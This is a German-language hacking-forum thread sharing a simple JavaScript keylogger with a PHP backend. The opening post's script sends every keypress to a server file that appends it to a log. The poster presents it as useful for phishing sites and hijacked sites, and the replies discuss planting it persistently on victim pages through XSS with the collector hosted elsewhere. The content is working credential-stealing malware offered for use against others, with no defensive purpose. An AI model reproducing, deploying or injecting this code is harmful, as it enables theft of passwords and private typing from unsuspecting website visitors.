Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

simpler JS-Keylogger

- - - - -

  • Bitte melde dich an um zu Antworten
3 Antworten in diesem Thema

#1
B1nary

B1nary

    Samurai

  • Elite Member
  • Likes
    489
  • 506 Beiträge
  • 346 Bedankt
Hi zusammen,

hab was ganz Brauchbares gefunden: einen Javascript-Keylogger

index.php
<script type="text/javascript">
document.onkeypress = function(log) {
log = log || window.event;
	 if (String.fromCharCode(log.charCode)) {
		 var http = new XMLHttpRequest();
		 var input = encodeURI(String.fromCharCode(log.charCode));
		 http.open("POST", "keylogger.php", true);
		 http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
		 http.send("inp=" + input); } }
</script>

keylogger.php
<?php
$keylog = $_POST['inp'];
if (!empty($keylog)):
    $fopen = @fopen('log.txt', 'a+');
    @fwrite($fopen, $keylog);
    @fclose($fopen);
endif;
?>

Die log.txt wird automatisch erstellt.
Brauchbar für: Phishing-Sites, shelled Sites

hf

#2
0x90

0x90

    Noob

  • Members
  • PIPPIP
  • Likes
    6
  • 9 Beiträge
  • 1 Bedankt
  • verifiziert
Loggt aber nur auf der aktuellen Domain. Wenn sich der Cursor in einem iFrame befindet, was auf ne andere Domain pointed, wird nichts geloggt.
  • Cube und Iron gefällt das

#3
CyberFlash

CyberFlash

    Moderator

  • Moderator
  • Likes
    119
  • 133 Beiträge
  • 43 Bedankt
Das ganze könnte auch mit XSS gemischt werden .. ?
Heut Abend ma testen ;)
Danke schon ma ^^.png' class='bbc_emoticon' alt='^^' />

#4
B1nary

B1nary

    Samurai

  • Elite Member
  • Likes
    489
  • 506 Beiträge
  • 346 Bedankt

Das ganze könnte auch mit XSS gemischt werden .. ?
Heut Abend ma testen ;)
Danke schon ma ^^.png' class='bbc_emoticon' alt='^^' />


joa, wenn du die keylogger.php auslagerst und das Javascript persistent via XSS auf der Vic-Page speichern könntest....das wär natürlich geil :P



  Thema Forum Themenstarter Statistik Letzter Beitrag

Dieses Thema wurde von 94 Mitglied(ern) gelesen


    _wh, .:dodo:., .Puma, 007, 0x90, adn1337, AFK_D4m4ge, Alpha63, Amphe1337, B0ss, B1nary, Banger109, Benutzer, blue_eyed_devil, Bot4ng, C64, Ch!ller, codec4, corkscrew, Cube, cyberblade, CyberFlash, Dean36, DeineSicherheit, dervonheute, Dude1308, Elke, Erikson, exsize, FalkE, fl4shx, Framerater, H2Olli, hackEmcee, Heinokel0903, Iron, jack4flash, Julez, juPP, Kaban, kiwitone, lion., lNobodyl, lolorollo, M4cbook, man, marcf2009, massa, matrix567, MCP2000, Melson, Mofug, MS1337, muLTiii, NewHacker, nibble nibble, niklas, nong_dan, opheus, PaulaAbdul, paulaner, peppi200, prto, Psykoon303, pszalewicz, QwErTyYyY, Ragevalley, Rasputin, ReBBeL, Red Hat, retr0, scrack, Siggisuper, sissler, slivanX, smc2014, Stech3r, sub0, Syorack, Techret, thunfisch, Tinoindahouse, TOKAREV, Toolbase, VerZus, WarRaZzer, White-Warti, xaeiou, Xenio, xsasuke16x, xtrx, xxas, Zerobyte, ZeroCool_AT
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.